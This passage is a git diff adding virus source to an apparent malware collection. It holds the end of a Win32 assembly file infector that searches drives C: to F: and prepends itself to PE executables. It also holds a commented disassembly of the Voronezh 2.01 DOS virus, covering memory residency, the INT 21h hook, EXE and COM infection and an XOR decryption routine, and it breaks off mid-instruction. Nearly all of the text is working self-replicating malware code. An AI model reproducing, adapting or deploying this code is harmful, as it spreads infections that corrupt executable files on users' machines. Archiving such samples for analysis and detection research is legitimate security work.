ftLastAccessTime FILETIME <> ; Specifies the time that the file was + ; last accessed + ftLastWriteTime FILETIME <> ; Specifies the time that the file was + ; last written to + nFileSizeHigh DWORD ? ; Specifies the high-order DWORD value + ; of the file size, in bytes + nFileSizeLow DWORD ? ; Specifies the low-order DWORD value + ; of the file size, in bytes + dwReserved0 DWORD ? ; Reserved for future use + dwReserved1 DWORD ? ; Reserved for future use + cFileName BYTE MAX_PATH dup(?) + ; A null-terminated string that is the + ; name of the file + cAlternate BYTE 0eh dup(?) ; A null-terminated string that is an + ; alternative name for the file +ends + +PROCESS_INFORMATION struct + hProcess DWORD ? ; Handle to the newly created process + hThread DWORD ? ; Handle to the primary thread of the + ; newly created process + dwProcessId DWORD ? ; Global process identifier that can + ; be used to identify a process + dwThreadId DWORD ? ; global thread identifiers that can + ; be used to identify a thread +ends + +szFileName db '*.EXE',00h ; Name of file to search for +szFileName_ db '*.*',00h ; " " " " " " +szCurDir db 'c:\',00h ; Name of new current directory + db 'Magic People-Voodoo People !',00h + db 00h +ProcessInformation PROCESS_INFORMATION <> +dwExitCode dd ? ; Termination status +dwFileHandle dd ? ; File handle +dwFileHandle_ dd ? ; File handle +dwMappingHandle dd ? ; File mapping handle +lpMappedView dd ? ; Starting address of the mapped view +dwFileSize dd ? ; Low-order doubleword of the file + ; size +infect_flag db ? ; Infection flag +exit_flag db ? ; Exit flag +NumberOfBytesRead dd ? ; Number of bytes read +lpFileExtension dd ? ; Pointer to file extension +StartupInfo STARTUPINFO <> +szFileName__: + db 11ah dup(00h) + db 206h dup(?) +FindFileData WIN32_FIND_DATA <> + db 20eh dup(?) +cBuffer db VirusSize dup(?) + ; Buffer that receives data +dwSearchHandle dd ? ; Search handle +dwSearchHandle_ dd ? ; Search handle +szCurDir_: +cBuffer_ db 320h dup(?) ; Buffer for current directory +szCurDir__: +cBuffer__ db 320h dup(?) ; Buffer for current directory + db 724h dup(?) + +.code +code_begin: + push offset StartupInfo ; Address of STARTUPINFO structure + call GetStartupInfoA + + call GetCommandLineA + mov esi,eax ; ESI = pointer to the command-line + ; string for the current process + cmp byte ptr [esi+01h],':' ; Not Universal Naming Convention + ; (UNC)? + je _lstrcpyA ; Equal? Jump to _lstrcpyA + + inc eax ; Increase pointer to the command-line + ; string for the current process +_lstrcpyA: + push eax ; EAX = address of string to copy + push offset szFileName__ ; Address of buffer + call lstrcpyA + + lea esi,szFileName__ ; ESI = offset of szFileName__ +find_dot_in_filename: + inc esi ; Increase pointer to the command-line + ; string for the current process + + cmp byte ptr [esi],'.' ; Found dot in filename? + jne find_dot_in_filename ; Not equal? Jump to + ; find_dot_in_filename + mov byte ptr [esi+04h],00 ; Store zero at end of filename + mov [lpFileExtension],esi ; Store pointer to file extension + + push 00h ; Handle of file with attributes to + ; copy + push FILE_ATTRIBUTE_ARCHIVE ; File attributes + push OPEN_EXISTING ; How to create + push 00h ; Address of security descriptor + push FILE_SHARE_READ ; Share mode + push GENERIC_READ ; Access (read-write) mode + push offset szFileName__ ; Address of name of the file + call CreateFileA + mov [dwFileHandle],eax ; Store file handle + + push eax ; EAX = file handle + push 00h ; Address of structure for data + push offset NumberOfBytesRead + ; Address of number of bytes read + push VirusSize ; Number of bytes to read + push offset cBuffer ; Address of buffer that receives data + push eax ; Handle of file to read + call ReadFile + pop eax ; EAX = file handle + + push 00h ; Address of high-order word for file + ; size + push eax ; Handle of file to get size of + call GetFileSize + mov [dwFileSize],eax ; Store low-order doubleword of the + ; file size + cmp eax,VirusSize ; First generation? + je virus_exit ; Equal? Jump to virus_exit + + mov esi,[lpFileExtension] ; ESI = pointer to file extension + mov [esi],'MOC.' ; Store file extension + cmp [esi+05h],'$$$$' ; Temporarily disnfected file? + je _DeleteFileA ; Equal? Jump to _DeleteFileA + + push 00h ; Handle of file with attributes to + ; copy + push FILE_ATTRIBUTE_ARCHIVE ; File attributes + push CREATE_NEW + OPEN_EXISTING + ; How to create + push 00h ; Address of security descriptor + push FILE_SHARE_READ + FILE_SHARE_WRITE + ; Share mode + push GENERIC_READ + GENERIC_WRITE + ; Access (read-write) mode + push offset szFileName__ ; Address of name of the file + call CreateFileA + mov [dwFileHandle_],eax ; Store file handle + + push 00h ; Name of file-mapping object + push [dwFileSize] ; Low-order doubleword of object size + push 00h ; High-order doubleword of object size + push PAGE_READWRITE ; Protection for mapping object + push 00h ; Optional security attributes + push [dwFileHandle_] ; Handle of file to map + call CreateFileMappingA + mov [dwMappingHandle],eax ; Store file mapping handle + + push [dwFileSize] ; Low-order doubleword of object size + push 00h ; Low-order doubleword of file offset + push 00h ; High-order doubleword of file offset + push FILE_MAP_WRITE ; Access mode + push eax ; File-mapping object to map into + ; address space + call MapViewOfFile + mov [lpMappedView],eax ; Store starting address of the mapped + ; view + + push 00h ; Address of structure for data + push offset NumberOfBytesRead + ; Address of number of bytes read + push [dwFileSize] ; Low-order doubleword of object size + push eax ; Address of buffer that receives data + push [dwFileHandle] ; Handle of file to read + call ReadFile + + push 00h ; Number of bytes in range + push [lpMappedView] ; Starting address of the mapped view + call FlushViewOfFile + + push [lpMappedView] ; Address where mapped view begins + call UnmapViewOfFile + + push [dwMappingHandle] ; Handle of object to close + call CloseHandle + + push [dwFileHandle_] ; Handle of object to close + call CloseHandle + + push offset ProcessInformation + ; Pointer to PROCESS_INFORMATION + push offset StartupInfo ; Pointer to STARTUPINFO + push 00h ; Pointer to current directory name + push 00h ; Pointer to new environment block + push NORMAL_PRIORITY_CLASS ; Creation flags + push 00h ; Handle inheritance flag + push 00h ; Pointer to thread security + ; attributes + push 00h ; Pointer to process security + ; attributes + + mov esi,[lpFileExtension] ; ESI = pointer to file extension + mov byte ptr [esi+04h],' ' ; Store space at end of filename + + push offset szFileName__ ; Pointer to command line string + push 00h ; Pointer to name of executable module + call CreateProcessA + + jmp _CloseHandle +virus_exit: + mov [exit_flag],TRUE ; Exit code for all threads +_CloseHandle: + push [dwFileHandle] ; Handle of object to close + call CloseHandle + + call infect_drives + cmp [exit_flag],TRUE ; Exit code for all threads? + je _ExitProcess ; Equal? Jump to _ExitProcess +_GetExitCodeProcess: + push offset dwExitCode ; Address to receive termination + ; status + push [ProcessInformation.hProcess] + ; Handle to the process + call GetExitCodeProcess + cmp [dwExitCode],00h ; No error? + je _CreateProcessA ; Equal? Jump to _CreateProcessA + + jmp _GetExitCodeProcess +_CreateProcessA: + push offset ProcessInformation + ; Pointer to PROCESS_INFORMATION + push offset StartupInfo ; Pointer to STARTUPINFO + push 00h ; Pointer to current directory name + push 00h ; Pointer to new environment block + push NORMAL_PRIORITY_CLASS ; Creation flags + push 00h ; Handle inheritance flag + push 00h ; Pointer to thread security + ; attributes + push 00h ; Pointer to process security + ; attributes + + mov esi,[lpFileExtension] ; ESI = pointer to file extension + mov byte ptr [esi+04h],' ' ; Store space at end of filename + mov [esi],'EXE.' ; Store file extension + mov [esi+05h],'$$$$' ; Store command-line + + push offset szFileName__ ; Pointer to command line string + push 00h ; Pointer to name of executable module + call CreateProcessA +_ExitProcess: + push 00h ; Exit code for all threads + call ExitProcess +_DeleteFileA: + push offset szFileName__ ; Address of name of file to delete + call DeleteFileA + + jmp _ExitProcess + +infect_drives proc near ; Infect drives + push offset cBuffer_ ; Address of buffer for current + ; directory + push nBufferLength ; Size, in characters, of directory + ; buffer + call GetCurrentDirectoryA + + call infect_directories + + mov ecx,04h ; Infect drive C:, D:, E: and F: +set_current_directory_loop: + push ecx ; ECX = counter + push offset szCurDir ; Address of name of new current + ; directory + call SetCurrentDirectoryA + + call infect_directories + + inc byte ptr [szCurDir] ; Increase drive letter + + pop ecx ; ECX = counter + loop set_current_directory_loop + + push offset szCurDir_ ; Address of name of new current + ; directory + call SetCurrentDirectoryA + + jmp _FindNextFileA + + ret ; Return + endp + +infect_directories proc near ; Infect directories + push offset cBuffer__ ; Address of buffer for current + ; directory + push nBufferLength ; Size, in characters, of directory + ; buffer + call GetCurrentDirectoryA + + push offset FindFileData ; Address of returned information + push offset szFileName_ ; Address of name of file to search + ; for + call FindFirstFileA + mov [dwSearchHandle],eax ; Store search handle +_FindNextFileA: + push offset FindFileData ; Address of returned information + push [dwSearchHandle] ; Handle of search + call FindNextFileA + or eax,eax ; Function failed? + jz function_failed ; Zero? Jump to function_failed + + cmp [FindFileData.cFileName],'.' + ; Directory? + je _FindNextFileA ; Equal? Jump to _FindNextFileA + mov eax,[FindFileData.dwFileAttributes] + and eax,FILE_ATTRIBUTE_DIRECTORY + ; Directory? + jz _FindNextFileA ; Zero? Jump to _FindNextFileA + + push offset szCurDir__ ; Address of name of new current + ; directory + call SetCurrentDirectoryA + + push offset FindFileData.cFileName + ; Address of name of new current + ; directory + call SetCurrentDirectoryA + + push offset FindFileData ; Address of returned information + push offset szFileName ; Address of name of file to search + ; for + call FindFirstFileA + mov [dwSearchHandle_],eax ; Store search handle + cmp eax,INVALID_HANDLE_VALUE + je _FindNextFileA ; Function failed? Jump to + ; _FindNextFileA +continue_a_file_search: + or eax,eax ; Function failed? + jz _FindNextFileA ; Zero? Jump to _FindNextFileA + + call infect_file + + push offset FindFileData ; Address of returned information + push [dwSearchHandle_] ; Handle of search + call FindNextFileA + + jmp continue_a_file_search +function_failed: + ret ; Return + endp + +infect_file proc near ; Infect file + push FILE_ATTRIBUTE_ARCHIVE ; Address of attributes to set + push offset FindFileData.cFileName + ; Address of filename + call SetFileAttributesA + + push 00h ; Handle of file with attributes to + ; copy + push FILE_ATTRIBUTE_ARCHIVE ; File attributes + push OPEN_EXISTING ; How to create + push 00h ; Address of security descriptor + push FILE_SHARE_READ + FILE_SHARE_WRITE + ; Share mode + push GENERIC_READ + GENERIC_WRITE + ; Access (read-write) mode + push offset FindFileData.cFileName + ; Address of name of the file + call CreateFileA + cmp eax,INVALID_HANDLE_VALUE + je _SetFileAttributesA ; Function failed? Jump to + ; _SetFileAttributesA + mov [dwFileHandle],eax ; Store file handle + + push 00h ; Address of high-order word for file + ; size + push eax ; Handle of file to get size of + call GetFileSize + mov [dwFileSize],eax ; Store low-order doubleword of the + ; file size +_CreateFileMappingA: + push eax ; EAX = low-order doubleword of the + ; file size + + push 00h ; Name of file-mapping object + push eax ; Low-order doubleword of object size + push 00h ; High-order doubleword of object size + push PAGE_READWRITE ; Protection for mapping object + push 00h ; Optional security attributes + push [dwFileHandle] + call CreateFileMappingA + mov [dwMappingHandle],eax ; Store file mapping handle + + push 00h ; Low-order doubleword of file offset + push 00h ; High-order doubleword of file offset + push FILE_MAP_WRITE ; Access mode + push eax ; File-mapping object to map into + ; address space + call MapViewOfFile + + cmp [infect_flag],TRUE ; Infect file? + je infect_file_ ; Equal? Jump to infect_file_ + + mov esi,eax ; ESI = starting address of the mapped + ; view + mov edi,[esi+3ch] ; EDI = offset of new executable (NE, + ; LE,etc) header within disk file + cmp dword ptr [esi+edi],'EP' + ; Portable Executable (PE)? + jne infect_exit ; Not equal? Jump to infect_exit + cmp [esi+6fh],'3NIW' + je infect_exit ; Equal? Jump to infect_exit + + call _UnmapViewOfFile + + mov [infect_flag],TRUE ; Infect file + + mov eax,[dwFileSize] ; EAX = Low-order doubleword of the + ; file size + add eax,VirusSize ; Add size of virus to low-order + ; doubleword of the file size + jmp _CreateFileMappingA +infect_file_: + mov [infect_flag],FALSE ; Don't infect file + mov [lpMappedView],eax ; Store starting address of the mapped + ; view + + push edi esi ecx ; Save registers at stack + pushf ; Save flags at stack + add eax,[dwFileSize] ; Add low-order doubleword of the file + ; size to starting address of the + ; mapped view + add eax,VirusSize-01h ; Add size of virus minus one to + ; starting address of the mapped view + mov edi,eax ; EDI = pointer to last byte of file + mov esi,[lpMappedView] ; ESI = starting address of the mapped + ; view + add esi,[dwFileSize] ; Add low-order doubleword of the file + ; size to starting address of the + ; mapped view + mov ecx,[dwFileSize] ; ECX = low-order doubleword of the + ; file size + dec esi ; ESI = pointer to last byte of + ; original code + std ; Set direction flag + rep movsb ; Move original code to end of file + + mov edi,[lpMappedView] ; EDI = starting address of the mapped + ; view + xor eax,eax ; Zero EAX + mov ecx,VirusSize ; Store seven thousand and forty-five + ; bytes + cld ; Clear direction flag + rep stosb ; Overwrite the first seven thousand + ; and forty-five bytes of original + ; code + + mov edi,[lpMappedView] ; EDI = starting address of the mapped + ; view + lea esi,cBuffer ; ESI = offset of cBuffer + mov ecx,VirusSize ; Move seven thousand and forty-five + ; bytes + cld ; Clear direction flag + rep movsb ; Move virus to beginning of file + popf ; Load flags from stack + pop ecx esi edi ; Load registers from stack +infect_exit: + call _UnmapViewOfFile + + push offset FindFileData.ftLastWriteTime-08h + ; Time the file was last written + push offset FindFileData.ftLastAccessTime-04h + ; Time the file was last accessed + push offset FindFileData.ftCreationTime + ; Time the file was created + push [dwFileHandle] ; Identifies the file + call SetFileTime + + push [dwFileHandle] ; Handle of object to close + call CloseHandle +_SetFileAttributesA: + push [FindFileData.dwFileAttributes] + ; Address of attributes to set + push offset FindFileData.cFileName + ; Address of filename + call SetFileAttributesA + + ret ; Return + endp + +_UnmapViewOfFile proc near ; Unmaps a mapped view of a file from + ; the calling process's address space + ; and close it + push [lpMappedView] ; Address where mapped view begins + call UnmapViewOfFile + + push [dwMappingHandle] ; Handle of object to close + call CloseHandle + + ret ; Return + endp +code_end: + +end code_begin \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.vor_1600.asm b/MSDOS/Virus.MSDOS.Unknown.vor_1600.asm new file mode 100644 index 00000000..7a0d586a --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.vor_1600.asm @@ -0,0 +1,1063 @@ +;======================================================= +; Virus Voronez 2.01 (August 1991 Zielona Gora, Poland) +; +; Disassembled by Andrzej Kadlof 1991 August +; +; (C) Polish Section Of Virus Information Bank +;======================================================= + +1EE6 9A19240657 call 5706:2419 + +; victim code + +1EEB 1E push ds +1EEC B82325 mov ax,2523 + +;... +; +;------------------- +; virus entry point + +2419 8CD8 mov ax,ds +241B 0E push cs +241C 1F pop ds +241D 50 push ax +241E E80000 call 2421 ; get own offset +2421 5B pop bx + +2422 81EB0801 sub bx,0108 ; virus base +2426 53 push bx + +; is virus present in RAM? + +2427 B4AB mov ah,AB ; call for resident part +2429 CD21 int 21 + +242B 3D5555 cmp ax,5555 ; expected answer +242E 7503 jne 2433 ; not instaled + +2430 E9D000 jmp 2503 ; instaled, exit + +; install wirus in RAM + +2433 8CC0 mov ax,es ; PSP segment +2435 2D0100 sub ax,0001 ; MCB segment +2438 8ED8 mov ds,ax +243A BB0300 mov bx,0003 ; offset of size of block in MCB +243D 3E8B07 mov ax,ds:[bx] ; get size +2440 2DEA00 sub ax,00EA ; reserve 0EA0h bytes for virus (3744) +2443 3E8907 mov ds:[bx],ax ; store new block size +2446 06 push es ; restore DS +2447 1F pop ds +2448 BB0200 mov bx,0002 ; offset of MEM size in PSP +244B 3E8B07 mov ax,ds:[bx] ; get MEM size +244E 2DEA00 sub ax,00EA ; decrease by 3744 bytes +2451 3E8907 mov ds:[bx],ax ; set new value in PSP +2454 8EC0 mov es,ax ; segment for new virus location +2456 BF0001 mov di,0100 ; offset of destination +2459 BE0001 mov si,0100 ; offset of source +245C 5B pop bx ; virus base +245D 53 push bx +245E 01DE add si,bx ; start of virus code +2460 0E push cs ; set DS to virus code +2461 1F pop ds +2462 B9A406 mov cx,06A4 ; length (1700) +2465 F3A4 rep movsb ; move to new place +2467 8BD0 mov dx,ax ; segment of new location +2469 EB74 jmp 24DF ; continue +246B 90 nop + +;------------------ +; INT 21h handler + +246C 9C pushf +246D FB sti +246E 80FCAB cmp ah,AB ; virus call +2471 7505 jne 2478 ; no + +2473 B85555 mov ax,5555 ; answer: I'm here +2476 9D popf +2477 CF iret + +2478 3D003D cmp ax,3D00 ; open file for read only +247B 7540 jne 24BD + +; open file for read only + +247D 50 push ax +247E 53 push bx +247F 51 push cx +2480 52 push dx +2481 56 push si +2482 57 push di +2483 06 push es +2484 B94100 mov cx,0041 ; maximum path length +2487 30C0 xor al,al +2489 8BFA mov di,dx ; offset of path +248B 1E push ds +248C 07 pop es +248D F2AE repnz scasb ; find end of string +248F 83EF04 sub di,0004 ; point at extension +2492 8BF7 mov si,di +2494 56 push si ; offset of extension +2495 0E push cs +2496 07 pop es +2497 B90400 mov cx,0004 ; extension length +249A BF8902 mov di,0289 ; is it EXE? +249D F3A6 rep cmpsb +249F 83F900 cmp cx,0000 +24A2 7504 jne 24A8 + +24A4 5E pop si ; balance stack +24A5 EB0D jmp 24B4 ; skip exe comparison +24A7 90 nop + +24A8 BF8C02 mov di,028C ; is it exe? +24AB B90400 mov cx,0004 +24AE 5E pop si ; offset of extension +24AF F3A6 rep cmpsb +24B1 83F900 cmp cx,0000 + +; restore callers registers + +24B4 07 pop es +24B5 5F pop di +24B6 5E pop si +24B7 5A pop dx +24B8 59 pop cx +24B9 5B pop bx +24BA 58 pop ax +24BB 7409 je 24C6 ; exe file, contaminate it! + +; not EXE file, maybe COM or subfunction <> 3D00h + +24BD 50 push ax ; store subfunction code +24BE FEC4 inc ah ; hide 4B00h comparison +24C0 3D004C cmp ax,4C00 ; "terminate" proces +24C3 58 pop ax ; restore subfunction +24C4 7513 jne 24D9 ; jump to old INT 21h + +; EXE file will be open for read only or any file will be loaded and executed +; store caller registers again + +24C6 50 push ax +24C7 53 push bx +24C8 51 push cx +24C9 52 push dx +24CA 56 push si +24CB 57 push di +24CC 06 push es +24CD 1E push ds +24CE E91F01 jmp 25F0 ; contaminate + +; jump to old INT 21h + +24D1 1F pop ds +24D2 07 pop es +24D3 5F pop di +24D4 5E pop si +24D5 5A pop dx +24D6 59 pop cx +24D7 5B pop bx +24D8 58 pop ax + +24D9 9D popf +24DA EA60147902 jmp 0279:1460 ; old INT 21h + +; ^^^^^^^^ old INT 21h (place holder) +;--------------------- +; continue instalation + +; get INT 21h + +24DF 8EDA mov ds,dx ; DS points at new virus location +24E1 B82135 mov ax,3521 +24E4 CD21 int 21 +24E6 3E891EC201 mov ds:[01C2],bx ; modify own code +24EB 3E8C06C401 mov ds:[01C4],es +24F0 3E891E7503 mov ds:[0375],bx +24F5 3E8C067703 mov ds:[0377],es + +; set new INT 21h + +24FA 8D165301 lea dx,[0153] ; here 246C +24FE B82125 mov ax,2521 +2501 CD21 int 21 + +2503 5A pop dx ; virus base +2504 BBB002 mov bx,02B0 ; offset of working varible +2507 01D3 add bx,dx ; add base +2509 2E803F00 cmp byte ptr [bx],00 ; carrier type +250D 7441 je 2550 ; carrier is COM file + +; carrier is EXE file + +250F 1F pop ds ; restore DS +2510 8CD8 mov ax,ds ; store new virus segment +2512 0E push cs +2513 1F pop ds +2514 8BCA mov cx,dx +2516 5F pop di ; entry point offset +2517 07 pop es ; entry point segment +2518 50 push ax +2519 83EF05 sub di,0005 ; length of FAR CALL + +; improper handling of the case when relocation item points exactly at +; fifth byte of stored code + +251C BEAF02 mov si,02AF ; extension of buffer +251F 01CE add si,cx ; virus base +2521 8A14 mov dl,[si] ; get sixth byte, this byte may by + ; changed during relocation proces + +; this byte should be added to sixth byte in file (counting from entry point) + +2523 26005505 add es:[di+05],dl ; add key +2527 26385505 cmp es:[di+05],dl ; was DL = 0? +252B 7703 ja 2530 ; jump if no + +252D 4E dec si +252E FE04 inc byte ptr [si] + +2530 8BD7 mov dx,di ; destination +2532 BEAA02 mov si,02AA ; source buffer +2535 01CE add si,cx ; add base +2537 B90500 mov cx,0005 ; number of bytes +253A F3A4 rep movsb +253C 1F pop ds + +253D 06 push es ; prepare long jump +253E 52 push dx +253F 8CD8 mov ax,ds ; reset registers +2541 8EC0 mov es,ax +2543 31C0 xor ax,ax +2545 31DB xor bx,bx +2547 31C9 xor cx,cx +2549 31D2 xor dx,dx +254B 31F6 xor si,si +254D 31FF xor di,di +254F CB retf ; jump to application + +; exit to COM application + +2550 8CC8 mov ax,cs +2552 8ED8 mov ds,ax +2554 8EC0 mov es,ax +2556 BE6802 mov si,0268 ; offset of encryption routine +2559 B90001 mov cx,0100 ; number of bytes +255C BB8102 mov bx,0281 ; file size +255F 8B3F mov di,[bx] +2561 83FF00 cmp di,0000 ; ?? +2564 7502 jne 2568 + +2566 CD20 int 20 ; terminate + +; form destination address + +2568 BB8302 mov bx,0283 ; place holder for virus length +256B 8B07 mov ax,[bx] ; virus length +256D 01C7 add di,ax ; add to file size +256F 81C70001 add di,0100 ; size of PSP +2573 FC cld +2574 57 push di ; destination address +2575 F3A4 rep movsb ; move part of code +2577 5F pop di ; restore address +2578 8B0E8302 mov cx,[0283] ; virus size +257C A18102 mov ax,[0281] ; file length +257F 57 push di ; prepare jump +2580 C3 ret ; jump to moved code (here 2581) + +;-------------------- +; encryption routine + +2581 050001 add ax,0100 ; PSP size +2584 8BF0 mov si,ax ; offset of encrypted block +2586 BF0001 mov di,0100 ; destination +2589 FC cld + +; decrypt block and copy it to begin of file + +258A 8A04 mov al,[si] +258C 34BB xor al,BB +258E 8805 mov [di],al +2590 46 inc si +2591 47 inc di +2592 E2F6 loop 258A + +; jump to application + +2594 B80001 mov ax,0100 ; entry point for EXE +2597 5B pop bx ; balance stack +2598 50 push ax ; prepare jump +2599 C3 ret ; jump to COM + +; working area + +259A 1926 ; [base + 0281] low word of file size +259C 4006 ; [base + 0283] size of virus, (high word of file length) +259E 014C ; [base + 0285] old INT 24h (offset) +25A0 169F ; [base + 0287] old INT 24h (segment) + +25A2 45 58 45 ; [base + 0289] 'EXE' +25A5 65 78 65 ; [base + 028C] 'exe' + +; unused + +; below line after xoring with 1A become: OleynikozL - name of the wirus author + +25A8 55 76 7F 63 74 73 71 75 60 56 ; Uvctsqu` + +25B1 56 6F 72 6F 6E 65 7A 68 2C ; Voronezh, +25BA 31 39 39 30 20 32 2E 30 31 ; 1990 2.01 + +; used data + +25C3 FC 0E 1F BA BB ; [base + 02AA] starting 5 bytes of EXE file +25C8 00 ; [base + 02AF] this byte is added to 02AE + ; if it is 0 then [02AE] is decreased by 1 +25C9 01 ; [base + 02B0] carrier type: 0 - EXE, 1 - COM + +25CA 0002 ; [base + 02B1] offset in header for new relocation entry +25CC E61E ; [base + 02B3] IP of EXE file +25CE 0000 ; [base + 02B5] CS of EXE file +25D0 0000 +25D2 00 +25D3 0000 ; [base + 02BA] virus entry point in file on disk +25D5 E620 ; [base + 02BC] - [02B1] +25D7 0000 ; [base + 02BE] segment of virus entry point +25D9 1924 ; [base + 02C0] offset +25DB 9A ; [base + 02C2] code of CALL SSSS:OOOO +25DC 1924 ; [base + 02C3] OOOO +25DE 0000 ; [base + 02C5] SSSS +25E0 0000 ; [base + 02C7] file position low word +25E2 1E00 ; [base + 02C9] file position high word +25E4 0001 ; [base + 02CB] size of buffer +25E6 0000 ; [base + 02CD] total size of readed part of ReloTabl +25E8 00 ; [base + 02CF] number of disk (0 - default, 1 - A, ...) +25E9 2000 ; [base + 02D0] file attributes +25EB B438 ; [base + 02D2] offset of file name +25ED 0F4C ; [base + 02D4] segment of file name + +;----------------- +; INT 24h handler + +25EF CF iret + +; jump here if EXE file is open or sam program is loaded and executed + +; check file name, skip file if fourth and fifth characters in path are 'CO' + +25F0 8BDA mov bx,dx ; offset of path +25F2 3E8B4703 mov ax,ds:[bx+03] ; skip 'd:\' (?) +25F6 3D434F cmp ax,4F43 ; 'CO' protect 'C:\COMMAND.COM' ? +25F9 7503 jne 25FE + +25FB E9D3FE jmp 24D1 ; jump to old INT 21h + +; check presence of disk specyfication + +25FE 8BFA mov di,dx ; offset of path +2600 31C0 xor ax,ax +2602 2EC606CF0200 mov byte ptr [02CF],00 ; default +2608 3E807D013A cmp ds:byte ptr [di+01],3A ; ':' is disk specified? +260D 7509 jne 2618 ; no + +; convert disk specyfication to number (A - 1, B - 2, ...) + +260F 3E8A05 mov al,ds:[di] +2612 249F and al,9F ; convert +2614 2EA2CF02 mov [02CF],al ; store disk number + +2618 B80043 mov ax,4300 ; get file attributes +261B CD21 int 21 + +; store address of path and file attributes + +261D 2E890ED002 mov [02D0],cx +2622 2E8C1ED202 mov [02D2],ds +2627 2E8916D402 mov [02D4],dx + +; intercepte INT 24h + +262C 1E push ds +262D 52 push dx +262E 06 push es + +262F 0E push cs +2630 1F pop ds +2631 B82435 mov ax,3524 +2634 CD21 int 21 +2636 891E8502 mov [0285],bx +263A 8C068702 mov [0287],es + +263E BAD602 mov dx,02D6 +2641 B82425 mov ax,2524 +2644 CD21 int 21 + +2646 07 pop es +2647 5A pop dx +2648 1F pop ds + +2649 1E push ds + +264A 0E push cs +264B 1F pop ds + +264C BB0001 mov bx,0100 +264F B94007 mov cx,0740 ; offset of buffer +2652 29D9 sub cx,bx ; virus length +2654 BB8302 mov bx,0283 ; offset of varible +2657 890F mov [bx],cx ; size of virus/crypted block + +2659 1F pop ds + +265A 8BDA mov bx,dx ; waste of time +265C 1E push ds ; store address of path +265D 52 push dx +265E 53 push bx ; waste of time + +265F 0E push cs +2660 1F pop ds + +2661 B436 mov ah,36 ; disk free +2663 8A16CF02 mov dl,[02CF] ; disk number +2667 CD21 int 21 + +2669 3DFFFF cmp ax,FFFF ; check for error +266C 7509 jne 2677 ; ok + +; disk not accessible, exit + +266E 58 pop ax ; balance stack +266F 58 pop ax +2670 58 pop ax +2671 E8A203 call 2A16 ; restore INT 24h +2674 E95AFE jmp 24D1 ; jump to old INT 21h + +; convert disk free space into bytes + +2677 F7E3 mul bx +2679 F7E1 mul cx +267B 09D2 or dx,dx +267D 7506 jne 2685 ; plenty of free room + +267F 3B068302 cmp ax,[0283] ; minimum disk free space +2683 72E9 jb 266E ; disk full, exit + +2685 5B pop bx ; balance stack +2686 5A pop dx ; path address +2687 1F pop ds +2688 B8003D mov ax,3D00 ; open file for read only +268B 9C pushf +268C FA cli +268D 9A60147902 call 0279:1460 ; old INT 21h + +; ^^^^^^^^ old INT 21h (place holder) + +2692 7306 jnb 269A ; OK + +2694 E87F03 call 2A16 ; restore INT 24h +2697 E937FE jmp 24D1 ; jump to old INT 21h + +269A 50 push ax ; store handle +269B 8CC8 mov ax,cs ; set DS and ES to virus segment +269D 8ED8 mov ds,ax +269F 8EC0 mov es,ax +26A1 58 pop ax ; restore handle +26A2 50 push ax ; store handle +26A3 8BD8 mov bx,ax +26A5 B80057 mov ax,5700 ; get file time/date stamp +26A8 CD21 int 21 + +26AA 58 pop ax ; restore handle +26AB 51 push cx ; attributes +26AC 52 push dx ; offset of path +26AD 50 push ax ; handle + +; get file size + +26AE 8BD8 mov bx,ax ; handle +26B0 B90000 mov cx,0000 +26B3 BA0000 mov dx,0000 +26B6 B442 mov ah,42 ; move file ptr +26B8 B002 mov al,02 ; to EOF +26BA CD21 int 21 + +26BC BB8102 mov bx,0281 ; store low word of file length +26BF 8907 mov [bx],ax + +; waste of time or programmers error + +26C1 BB8302 mov bx,0283 ; 'store' high word of file length +26C4 8B0F mov cx,[bx] ; <- error (?), maybe: mov [bx],cx ? + +; move file ptr to BOF + +26C6 B90000 mov cx,0000 +26C9 BA0000 mov dx,0000 +26CC B80042 mov ax,4200 ; move file ptr to BOF +26CF 5B pop bx ; restore handle +26D0 53 push bx +26D1 CD21 int 21 + +; read [0283] bytes of file to buffer located above virus + +26D3 BB8302 mov bx,0283 ; working varible +26D6 8B0F mov cx,[bx] ; length of virus/encrypted block +26D8 5B pop bx ; restore handle +26D9 53 push bx +26DA BA4007 mov dx,0740 ; buffer +26DD B43F mov ah,3F ; read file +26DF CD21 int 21 + +26E1 BE4007 mov si,0740 ; buffer +26E4 8B0C mov cx,[si] ; first word +26E6 81F98CD8 cmp cx,D88C ; signature in COM file +26EA 7509 jne 26F5 ; clear COM or EXE file + +; this is infected COM file, exit + +26EC 5B pop bx ; handle +26ED 58 pop ax ; balance stack +26EE 58 pop ax +26EF E81F03 call 2A11 ; close file and restore INT 24h +26F2 E9DCFD jmp 24D1 ; jump to old INT 21h + +; is it EXE file or clear COM? + +26F5 81F94D5A cmp cx,5A4D ; EXE marker +26F9 7403 je 26FE ; yes + +26FB E98902 jmp 2987 ; infect COM file + +; check EXE file + +26FE 5B pop bx ; restore handle +26FF 53 push bx +2700 B80042 mov ax,4200 ; move file ptr to BOF +2703 31C9 xor cx,cx +2705 31D2 xor dx,dx +2707 CD21 int 21 + +2709 B93200 mov cx,0032 ; block size +270C B8003F mov ax,3F00 ; read file +270F 8D164007 lea dx,[0740] ; buffer +2713 CD21 int 21 + +; check free place in relocation table + +2715 A14607 mov ax,[0746] ; ReloCnt +2718 B90400 mov cx,0004 ; entry size +271B F7E1 mul cx ; AX size of relocation table +271D 8B1E5807 mov bx,[0758] ; TablOff +2721 01D8 add ax,bx +2723 8BD0 mov dx,ax ; size of used area in header +2725 8BFA mov di,dx +2727 A14807 mov ax,[0748] ; HdrSize +272A B91000 mov cx,0010 ; convert to bytes +272D F7E1 mul cx +272F 8BD7 mov dx,di ; used header size +2731 83C204 add dx,0004 ; one additional entry +2734 39D0 cmp ax,dx ; is free space? +2736 7703 ja 273B ; yes + +2738 E94902 jmp 2984 ; relocation table is full, exit + +; prepare new header + +273B A3B102 mov [02B1],ax ; offset of first unused entry +273E A14607 mov ax,[0746] ; ReloCnt +2741 40 inc ax ; add one entry +2742 A34607 mov [0746],ax ; ReloCnt, store new value of counter +2745 A15407 mov ax,[0754] ; IP +2748 A3B302 mov [02B3],ax ; store oryginal IP +274B A15607 mov ax,[0756] ; CS +274E A3B502 mov [02B5],ax ; store oryginal CS +2751 31D2 xor dx,dx +2753 31C9 xor cx,cx +2755 B80242 mov ax,4202 ; move file ptr to EOF +2758 5B pop bx ; restore handle +2759 53 push bx +275A CD21 int 21 + +275C 50 push ax ; store file length +275D 52 push dx +275E 03068302 add ax,[0283] ; find new file length +2762 3B068302 cmp ax,[0283] ; long integer addition +2766 7701 